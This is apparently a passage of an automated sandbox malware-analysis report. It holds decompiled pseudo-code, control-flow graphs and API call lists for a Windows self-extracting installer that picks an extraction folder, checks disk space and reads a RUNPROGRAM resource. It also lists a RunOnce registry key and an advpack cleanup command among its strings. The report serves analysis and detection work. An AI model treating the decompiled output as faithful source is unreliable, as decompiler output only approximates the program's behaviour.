                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                          • API String ID: 178549006-3073904943
                                                          • Opcode ID: c1aee6cb3cff18512ef44d2292213b8833d1a1af5ca9d18ed95a5df1f0c280f0
                                                          • Instruction ID: 8075c06a09dbd929f7282c6d0e6b94a729580edfb6b03efc441a584d2cc461b9
                                                          • Opcode Fuzzy Hash: c1aee6cb3cff18512ef44d2292213b8833d1a1af5ca9d18ed95a5df1f0c280f0
                                                          • Instruction Fuzzy Hash: CA5124B5A00218BBDF309B64DC68FFA7B6CFB91700F0041E9BAC9E7145DA7699489B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 232 10955a0-10955d9 call 109468f LocalAlloc 235 10955db-10955f1 call 10944b9 call 1096285 232->235 236 10955fd-109560c call 109468f 232->236 248 10955f6-10955f8 235->248 242 109560e-1095630 call 10944b9 LocalFree 236->242 243 1095632-1095643 lstrcmpA 236->243 242->248 246 109564b-1095659 LocalFree 243->246 247 1095645 243->247 250 109565b-109565d 246->250 251 1095696-109569c 246->251 247->246 252 10958b7-10958c7 call 1096ce0 248->252 255 1095669 250->255 256 109565f-1095667 250->256 253 109589f-10958b5 call 1096517 251->253 254 10956a2-10956a8 251->254 253->252 254->253 260 10956ae-10956c1 GetTempPathA 254->260 257 109566b-109567a call 1095467 255->257 256->255 256->257 269 109589b-109589d 257->269 270 1095680-1095691 call 10944b9 257->270 264 10956f3-1095711 call 1091781 260->264 265 10956c3-10956c9 call 1095467 260->265 274 109586c-1095890 GetWindowsDirectoryA call 109597d 264->274 275 1095717-1095729 GetDriveTypeA 264->275 272 10956ce-10956d0 265->272 269->252 270->248 272->269 276 10956d6-10956df call 1092630 272->276 274->264 289 1095896 274->289 278 109572b-109572e 275->278 279 1095730-1095740 GetFileAttributesA 275->279 276->264 290 10956e1-10956ed call 1095467 276->290 278->279 282 1095742-1095745 278->282 279->282 283 109577e-109578f call 109597d 279->283 287 109576b 282->287 288 1095747-109574f 282->288 297 1095791-109579e call 1092630 283->297 298 10957b2-10957bf call 1092630 283->298 291 1095771-1095779 287->291 288->291 294 1095751-1095753 288->294 289->269 290->264 290->269 295 1095864-1095866 291->295 294->291 299 1095755-1095762 call 1096952 294->299 295->274 295->275 297->287 306 10957a0-10957b0 call 109597d 297->306 307 10957c1-10957cd GetWindowsDirectoryA 298->307 308 10957d3-10957f8 call 109658a GetFileAttributesA 298->308 299->287 309 1095764-1095769 299->309 306->287 306->298 307->308 314 109580a 308->314 315 10957fa-1095808 CreateDirectoryA 308->315 309->283 309->287 316 109580d-109580f 314->316 315->316 317 1095811-1095825 316->317 318 1095827-109585c SetFileAttributesA call 1091781 call 1095467 316->318 317->295 318->269 323 109585e 318->323 323->295
                                                          C-Code - Quality: 92%
                                                          			E010955A0(void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v265;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				int _t32;
                                                          				int _t33;
                                                          				int _t35;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				int _t44;
                                                          				long _t48;
                                                          				int _t49;
                                                          				int _t50;
                                                          				signed int _t53;
                                                          				int _t54;
                                                          				int _t59;
                                                          				char _t60;
                                                          				int _t65;
                                                          				char _t66;
                                                          				int _t67;
                                                          				int _t68;
                                                          				int _t69;
                                                          				int _t70;
                                                          				int _t71;
                                                          				struct _SECURITY_ATTRIBUTES* _t72;
                                                          				int _t73;
                                                          				CHAR* _t82;
                                                          				CHAR* _t88;
                                                          				void* _t103;
                                                          				signed int _t110;
                                                          
                                                          				_t28 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t28 ^ _t110;
                                                          				_t2 = E0109468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                          				_t109 = LocalAlloc(0x40, _t2);
                                                          				if(_t109 != 0) {
                                                          					_t82 = "RUNPROGRAM";
                                                          					_t32 = E0109468F(_t82, _t109, 1);
                                                          					__eflags = _t32;
                                                          					if(_t32 != 0) {
                                                          						_t33 = lstrcmpA(_t109, "<None>");
                                                          						__eflags = _t33;
                                                          						if(_t33 == 0) {
                                                          							 *0x1099a30 = 1;
                                                          						}
                                                          						LocalFree(_t109);
                                                          						_t35 =  *0x1098b3e; // 0x0
                                                          						__eflags = _t35;
                                                          						if(_t35 == 0) {
                                                          							__eflags =  *0x1098a24; // 0x0
                                                          							if(__eflags != 0) {
                                                          								L46:
                                                          								_t101 = 0x7d2;
                                                          								_t36 = E01096517(_t82, 0x7d2, 0, E01093210, 0, 0);
                                                          								asm("sbb eax, eax");
                                                          								_t38 =  ~( ~_t36);
                                                          							} else {
                                                          								__eflags =  *0x1099a30; // 0x0
                                                          								if(__eflags != 0) {
                                                          									goto L46;
                                                          								} else {
                                                          									_t109 = 0x10991e4;
                                                          									_t40 = GetTempPathA(0x104, 0x10991e4);
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L19:
                                                          										_push(_t82);
                                                          										E01091781( &_v268, 0x104, _t82, "A:\\");
                                                          										__eflags = _v268 - 0x5a;
                                                          										if(_v268 <= 0x5a) {
                                                          											do {
                                                          												_t109 = GetDriveTypeA( &_v268);
                                                          												__eflags = _t109 - 6;
                                                          												if(_t109 == 6) {
                                                          													L22:
                                                          													_t48 = GetFileAttributesA( &_v268);
                                                          													__eflags = _t48 - 0xffffffff;
                                                          													if(_t48 != 0xffffffff) {
                                                          														goto L30;
                                                          													} else {
                                                          														goto L23;
                                                          													}
                                                          												} else {
                                                          													__eflags = _t109 - 3;
                                                          													if(_t109 != 3) {
                                                          														L23:
                                                          														__eflags = _t109 - 2;
                                                          														if(_t109 != 2) {
                                                          															L28:
                                                          															_t66 = _v268;
                                                          															goto L29;
                                                          														} else {
                                                          															_t66 = _v268;
                                                          															__eflags = _t66 - 0x41;
                                                          															if(_t66 == 0x41) {
                                                          																L29:
                                                          																_t60 = _t66 + 1;
                                                          																_v268 = _t60;
                                                          																goto L42;
                                                          															} else {
                                                          																__eflags = _t66 - 0x42;
                                                          																if(_t66 == 0x42) {
                                                          																	goto L29;
                                                          																} else {
                                                          																	_t68 = E01096952( &_v268);
                                                          																	__eflags = _t68;
                                                          																	if(_t68 == 0) {
                                                          																		goto L28;
                                                          																	} else {
                                                          																		__eflags = _t68 - 0x19000;
                                                          																		if(_t68 >= 0x19000) {
                                                          																			L30:
                                                          																			_push(0);
                                                          																			_t103 = 3;
                                                          																			_t49 = E0109597D( &_v268, _t103, 1);
                                                          																			__eflags = _t49;
                                                          																			if(_t49 != 0) {
                                                          																				L33:
                                                          																				_t50 = E01092630(0,  &_v268, 1);
                                                          																				__eflags = _t50;
                                                          																				if(_t50 != 0) {
                                                          																					GetWindowsDirectoryA( &_v268, 0x104);
                                                          																				}
                                                          																				_t88 =  &_v268;
                                                          																				E0109658A(_t88, 0x104, "msdownld.tmp");
                                                          																				_t53 = GetFileAttributesA( &_v268);
                                                          																				__eflags = _t53 - 0xffffffff;
                                                          																				if(_t53 != 0xffffffff) {
                                                          																					_t54 = _t53 & 0x00000010;
                                                          																					__eflags = _t54;
                                                          																				} else {
                                                          																					_t54 = CreateDirectoryA( &_v268, 0);
                                                          																				}
                                                          																				__eflags = _t54;
                                                          																				if(_t54 != 0) {
                                                          																					SetFileAttributesA( &_v268, 2);
                                                          																					_push(_t88);
                                                          																					_t109 = 0x10991e4;
                                                          																					E01091781(0x10991e4, 0x104, _t88,  &_v268);
                                                          																					_t101 = 1;
                                                          																					_t59 = E01095467(0x10991e4, 1, 0);
                                                          																					__eflags = _t59;
                                                          																					if(_t59 != 0) {
                                                          																						goto L45;
                                                          																					} else {
                                                          																						_t60 = _v268;
                                                          																						goto L42;
                                                          																					}
                                                          																				} else {
                                                          																					_t60 = _v268 + 1;
                                                          																					_v265 = 0;
                                                          																					_v268 = _t60;
                                                          																					goto L42;
                                                          																				}
                                                          																			} else {
                                                          																				_t65 = E01092630(0,  &_v268, 1);
                                                          																				__eflags = _t65;
                                                          																				if(_t65 != 0) {
                                                          																					goto L28;
                                                          																				} else {
                                                          																					_t67 = E0109597D( &_v268, 1, 1, 0);
                                                          																					__eflags = _t67;
                                                          																					if(_t67 == 0) {
                                                          																						goto L28;
                                                          																					} else {
                                                          																						goto L33;
                                                          																					}
                                                          																				}
                                                          																			}
                                                          																		} else {
                                                          																			goto L28;
                                                          																		}
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													} else {
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												goto L47;
                                                          												L42:
                                                          												__eflags = _t60 - 0x5a;
                                                          											} while (_t60 <= 0x5a);
                                                          										}
                                                          										goto L43;
                                                          									} else {
                                                          										_t101 = 1;
                                                          										_t69 = E01095467(0x10991e4, 1, 3); // executed
                                                          										__eflags = _t69;
                                                          										if(_t69 != 0) {
                                                          											goto L45;
                                                          										} else {
                                                          											_t82 = 0x10991e4;
                                                          											_t70 = E01092630(0, 0x10991e4, 1);
                                                          											__eflags = _t70;
                                                          											if(_t70 != 0) {
                                                          												goto L19;
                                                          											} else {
                                                          												_t101 = 1;
                                                          												_t82 = 0x10991e4;
                                                          												_t71 = E01095467(0x10991e4, 1, 1);
                                                          												__eflags = _t71;
                                                          												if(_t71 != 0) {
                                                          													goto L45;
                                                          												} else {
                                                          													do {
                                                          														goto L19;
                                                          														L43:
                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                          														_push(4);
                                                          														_t101 = 3;
                                                          														_t82 =  &_v268;
                                                          														_t44 = E0109597D(_t82, _t101, 1);
                                                          														__eflags = _t44;
                                                          													} while (_t44 != 0);
                                                          													goto L2;
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							__eflags = _t35 - 0x5c;
                                                          							if(_t35 != 0x5c) {
                                                          								L10:
                                                          								_t72 = 1;
                                                          							} else {
                                                          								__eflags =  *0x1098b3f - _t35; // 0x0
                                                          								_t72 = 0;
                                                          								if(__eflags != 0) {
                                                          									goto L10;
                                                          								}
                                                          							}
                                                          							_t101 = 0;
                                                          							_t73 = E01095467(0x1098b3e, 0, _t72);
                                                          							__eflags = _t73;
                                                          							if(_t73 != 0) {
                                                          								L45:
                                                          								_t38 = 1;
                                                          							} else {
                                                          								_t101 = 0x4be;
                                                          								E010944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                          								goto L2;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t101 = 0x4b1;
                                                          						E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						LocalFree(_t109);
                                                          						 *0x1099124 = 0x80070714;
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					_t101 = 0x4b5;
                                                          					E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					 *0x1099124 = E01096285();
                                                          					L2:
                                                          					_t38 = 0;
                                                          				}
                                                          				L47:
                                                          				return E01096CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                          			}





































                                                          0x010955ab
                                                          0x010955b2
                                                          0x010955c9
                                                          0x010955d5
                                                          0x010955d9
                                                          0x01095600
                                                          0x01095605
                                                          0x0109560a
                                                          0x0109560c
                                                          0x01095638
                                                          0x01095641
                                                          0x01095643
                                                          0x01095645
                                                          0x01095645
                                                          0x0109564c
                                                          0x01095652
                                                          0x01095657
                                                          0x01095659
                                                          0x01095696
                                                          0x0109569c
                                                          0x0109589f
                                                          0x010958a7
                                                          0x010958ac
                                                          0x010958b3
                                                          0x010958b5
                                                          0x010956a2
                                                          0x010956a2
                                                          0x010956a8
                                                          0x00000000
                                                          0x010956ae
                                                          0x010956ae
                                                          0x010956b9
                                                          0x010956bf
                                                          0x010956c1
                                                          0x010956f3
                                                          0x010956f3
                                                          0x01095705
                                                          0x0109570a
                                                          0x01095711
                                                          0x01095717
                                                          0x01095724
                                                          0x01095726
                                                          0x01095729
                                                          0x01095730
                                                          0x01095737
                                                          0x0109573d
                                                          0x01095740
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109572b
                                                          0x0109572b
                                                          0x0109572e
                                                          0x01095742
                                                          0x01095742
                                                          0x01095745
                                                          0x0109576b
                                                          0x0109576b
                                                          0x00000000
                                                          0x01095747
                                                          0x01095747
                                                          0x0109574d
                                                          0x0109574f
                                                          0x01095771
                                                          0x01095771
                                                          0x01095773
                                                          0x00000000
                                                          0x01095751
                                                          0x01095751
                                                          0x01095753
                                                          0x00000000
                                                          0x01095755
                                                          0x0109575b
                                                          0x01095760
                                                          0x01095762
                                                          0x00000000
                                                          0x01095764
                                                          0x01095764
                                                          0x01095769
                                                          0x0109577e
                                                          0x0109577e
                                                          0x01095781
                                                          0x01095788
                                                          0x0109578d
                                                          0x0109578f
                                                          0x010957b2
                                                          0x010957b8
                                                          0x010957bd
                                                          0x010957bf
                                                          0x010957cd
                                                          0x010957cd
                                                          0x010957dd
                                                          0x010957e3
                                                          0x010957ef
                                                          0x010957f5
                                                          0x010957f8
                                                          0x0109580a
                                                          0x0109580a
                                                          0x010957fa
                                                          0x01095802
                                                          0x01095802
                                                          0x0109580d
                                                          0x0109580f
                                                          0x01095830
                                                          0x01095836
                                                          0x0109583d
                                                          0x0109584b
                                                          0x01095851
                                                          0x01095855
                                                          0x0109585a
                                                          0x0109585c
                                                          0x00000000
                                                          0x0109585e
                                                          0x0109585e
                                                          0x00000000
                                                          0x0109585e
                                                          0x01095811
                                                          0x01095817
                                                          0x01095819
                                                          0x0109581f
                                                          0x00000000
                                                          0x0109581f
                                                          0x01095791
                                                          0x01095797
                                                          0x0109579c
                                                          0x0109579e
                                                          0x00000000
                                                          0x010957a0
                                                          0x010957a9
                                                          0x010957ae
                                                          0x010957b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010957b0
                                                          0x0109579e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095769
                                                          0x01095762
                                                          0x01095753
                                                          0x0109574f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109572e
                                                          0x00000000
                                                          0x01095864
                                                          0x01095864
                                                          0x01095864
                                                          0x01095717
                                                          0x00000000
                                                          0x010956c3
                                                          0x010956c5
                                                          0x010956c9
                                                          0x010956ce
                                                          0x010956d0
                                                          0x00000000
                                                          0x010956d6
                                                          0x010956d6
                                                          0x010956d8
                                                          0x010956dd
                                                          0x010956df
                                                          0x00000000
                                                          0x010956e1
                                                          0x010956e2
                                                          0x010956e4
                                                          0x010956e6
                                                          0x010956eb
                                                          0x010956ed
                                                          0x00000000
                                                          0x010956f3
                                                          0x010956f3
                                                          0x00000000
                                                          0x0109586c
                                                          0x01095878
                                                          0x0109587e
                                                          0x01095882
                                                          0x01095883
                                                          0x01095889
                                                          0x0109588e
                                                          0x0109588e
                                                          0x00000000
                                                          0x01095896
                                                          0x010956ed
                                                          0x010956df
                                                          0x010956d0
                                                          0x010956c1
                                                          0x010956a8
                                                          0x0109565b
                                                          0x0109565b
                                                          0x0109565d
                                                          0x01095669
                                                          0x01095669
                                                          0x0109565f
                                                          0x0109565f
                                                          0x01095665
                                                          0x01095667
                                                          0x00000000
                                                          0x00000000
                                                          0x01095667
                                                          0x0109566c
                                                          0x01095673
                                                          0x01095678
                                                          0x0109567a
                                                          0x0109589b
                                                          0x0109589b
                                                          0x01095680
                                                          0x01095685
                                                          0x0109568c
                                                          0x00000000
                                                          0x0109568c
                                                          0x0109567a
                                                          0x0109560e
                                                          0x01095613
                                                          0x0109561a
                                                          0x01095620
                                                          0x01095626
                                                          0x00000000
                                                          0x01095626
                                                          0x010955db
                                                          0x010955e0
                                                          0x010955e7
                                                          0x010955f1
                                                          0x010955f6
                                                          0x010955f6
                                                          0x010955f6
                                                          0x010958b7
                                                          0x010958c7

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010955CF
                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01095638
                                                          • LocalFree.KERNEL32(00000000), ref: 0109564C
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01095620
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010956B9
                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0109571E
                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01095737
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010957CD
                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010957EF
                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01095802
                                                            • Part of subcall function 01092630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01092654
                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01095830
                                                            • Part of subcall function 01096517: FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                            • Part of subcall function 01096517: LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                            • Part of subcall function 01096517: DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                            • Part of subcall function 01096517: FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01095878
                                                            • Part of subcall function 0109597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010959A8
                                                            • Part of subcall function 0109597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010959AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 2436801531-3498133043
                                                          • Opcode ID: e97da9fc17e086abd7e4764750c80d5d0ae04eb8b9f4472d85e88ceccebc0590
                                                          • Instruction ID: 21f664532f98582ecfb554b75907807023f811c8017cc8210043db99691d581e
                                                          • Opcode Fuzzy Hash: e97da9fc17e086abd7e4764750c80d5d0ae04eb8b9f4472d85e88ceccebc0590
                                                          • Instruction Fuzzy Hash: FE812870B042059ADF63AA7A9C74BFF76ADBB55300F0400E7E5C6E7181DE748E81AB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 324 109597d-10959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10959bb-10959d8 call 10944b9 call 1096285 324->325 326 10959dd-1095a1b GetDiskFreeSpaceA 324->326 343 1095c05-1095c14 call 1096ce0 325->343 328 1095ba1-1095bde memset call 1096285 GetLastError FormatMessageA 326->328 329 1095a21-1095a4a MulDiv 326->329 339 1095be3-1095bfc call 10944b9 SetCurrentDirectoryA 328->339 329->328 332 1095a50-1095a6c GetVolumeInformationA 329->332 335 1095a6e-1095ab0 memset call 1096285 GetLastError FormatMessageA 332->335 336 1095ab5-1095aca SetCurrentDirectoryA 332->336 335->339 337 1095acc-1095ad1 336->337 341 1095ad3-1095ad8 337->341 342 1095ae2-1095ae4 337->342 351 1095c02 339->351 341->342 346 1095ada-1095ae0 341->346 348 1095ae7-1095af8 342->348 349 1095ae6 342->349 346->337 346->342 353 1095af9-1095afb 348->353 349->348 354 1095c04 351->354 355 1095afd-1095b03 353->355 356 1095b05-1095b08 353->356 354->343 355->353 355->356 357 1095b0a-1095b1b call 10944b9 356->357 358 1095b20-1095b27 356->358 357->351 360 1095b29-1095b33 358->360 361 1095b52-1095b5b 358->361 360->361 364 1095b35-1095b50 360->364 362 1095b62-1095b6d 361->362 365 1095b6f-1095b74 362->365 366 1095b76-1095b7d 362->366 364->362 367 1095b85 365->367 368 1095b7f-1095b81 366->368 369 1095b83 366->369 370 1095b87-1095b94 call 109268b 367->370 371 1095b96-1095b9f 367->371 368->367 369->367 370->354 371->354
                                                          C-Code - Quality: 96%
                                                          			E0109597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				char _v16;
                                                          				char _v276;
                                                          				char _v788;
                                                          				long _v792;
                                                          				long _v796;
                                                          				long _v800;
                                                          				signed int _v804;
                                                          				long _v808;
                                                          				int _v812;
                                                          				long _v816;
                                                          				long _v820;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t46;
                                                          				int _t50;
                                                          				signed int _t55;
                                                          				void* _t66;
                                                          				int _t69;
                                                          				signed int _t73;
                                                          				signed short _t78;
                                                          				signed int _t87;
                                                          				signed int _t101;
                                                          				int _t102;
                                                          				unsigned int _t103;
                                                          				unsigned int _t105;
                                                          				signed int _t111;
                                                          				long _t112;
                                                          				signed int _t116;
                                                          				CHAR* _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          
                                                          				_t114 = __edi;
                                                          				_t46 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t46 ^ _t120;
                                                          				_v804 = __edx;
                                                          				_t118 = __ecx;
                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                          				if(_t50 != 0) {
                                                          					_push(__edi);
                                                          					_v796 = 0;
                                                          					_v792 = 0;
                                                          					_v800 = 0;
                                                          					_v808 = 0;
                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                          					__eflags = _t55;
                                                          					if(_t55 == 0) {
                                                          						L29:
                                                          						memset( &_v788, 0, 0x200);
                                                          						 *0x1099124 = E01096285();
                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          						_t110 = 0x4b0;
                                                          						L30:
                                                          						__eflags = 0;
                                                          						E010944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                          						SetCurrentDirectoryA( &_v276);
                                                          						L31:
                                                          						_t66 = 0;
                                                          						__eflags = 0;
                                                          						L32:
                                                          						_pop(_t114);
                                                          						goto L33;
                                                          					}
                                                          					_t69 = _v792 * _v796;
                                                          					_v812 = _t69;
                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                          					__eflags = _t116;
                                                          					if(_t116 == 0) {
                                                          						goto L29;
                                                          					}
                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                          					__eflags = _t73;
                                                          					if(_t73 != 0) {
                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                          						_t101 =  &_v16;
                                                          						_t111 = 6;
                                                          						_t119 = _t118 - _t101;
                                                          						__eflags = _t119;
                                                          						while(1) {
                                                          							_t22 = _t111 - 4; // 0x2
                                                          							__eflags = _t22;
                                                          							if(_t22 == 0) {
                                                          								break;
                                                          							}
                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                          							__eflags = _t87;
                                                          							if(_t87 == 0) {
                                                          								break;
                                                          							}
                                                          							 *_t101 = _t87;
                                                          							_t101 = _t101 + 1;
                                                          							_t111 = _t111 - 1;
                                                          							__eflags = _t111;
                                                          							if(_t111 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t111;
                                                          						if(_t111 == 0) {
                                                          							_t101 = _t101 - 1;
                                                          							__eflags = _t101;
                                                          						}
                                                          						 *_t101 = 0;
                                                          						_t112 = 0x200;
                                                          						_t102 = _v812;
                                                          						_t78 = 0;
                                                          						_t118 = 8;
                                                          						while(1) {
                                                          							__eflags = _t102 - _t112;
                                                          							if(_t102 == _t112) {
                                                          								break;
                                                          							}
                                                          							_t112 = _t112 + _t112;
                                                          							_t78 = _t78 + 1;
                                                          							__eflags = _t78 - _t118;
                                                          							if(_t78 < _t118) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t78 - _t118;
                                                          						if(_t78 != _t118) {
                                                          							__eflags =  *0x1099a34 & 0x00000008;
                                                          							if(( *0x1099a34 & 0x00000008) == 0) {
                                                          								L20:
                                                          								_t103 =  *0x1099a38; // 0x0
                                                          								_t110 =  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4));
                                                          								L21:
                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                          								if((_v804 & 0x00000003) != 3) {
                                                          									__eflags = _v804 & 0x00000001;
                                                          									if((_v804 & 0x00000001) == 0) {
                                                          										__eflags = _t103 - _t116;
                                                          									} else {
                                                          										__eflags = _t110 - _t116;
                                                          									}
                                                          								} else {
                                                          									__eflags = _t103 + _t110 - _t116;
                                                          								}
                                                          								if(__eflags <= 0) {
                                                          									 *0x1099124 = 0;
                                                          									_t66 = 1;
                                                          								} else {
                                                          									_t66 = E0109268B(_a4, _t110, _t103,  &_v16);
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _v816 & 0x00008000;
                                                          							if((_v816 & 0x00008000) == 0) {
                                                          								goto L20;
                                                          							}
                                                          							_t105 =  *0x1099a38; // 0x0
                                                          							_t110 =  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4));
                                                          							_t103 = (_t105 >> 2) +  *0x1099a38;
                                                          							goto L21;
                                                          						}
                                                          						_t110 = 0x4c5;
                                                          						E010944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                          						goto L31;
                                                          					}
                                                          					memset( &_v788, 0, 0x200);
                                                          					 *0x1099124 = E01096285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          					_t110 = 0x4f9;
                                                          					goto L30;
                                                          				} else {
                                                          					_t110 = 0x4bc;
                                                          					E010944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                          					 *0x1099124 = E01096285();
                                                          					_t66 = 0;
                                                          					L33:
                                                          					return E01096CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                          				}
                                                          			}



































                                                          0x0109597d
                                                          0x01095988
                                                          0x0109598f
                                                          0x0109599a
                                                          0x010959a6
                                                          0x010959a8
                                                          0x010959af
                                                          0x010959b9
                                                          0x010959dd
                                                          0x010959e4
                                                          0x010959f1
                                                          0x010959fe
                                                          0x01095a0b
                                                          0x01095a13
                                                          0x01095a19
                                                          0x01095a1b
                                                          0x01095ba1
                                                          0x01095baf
                                                          0x01095bbd
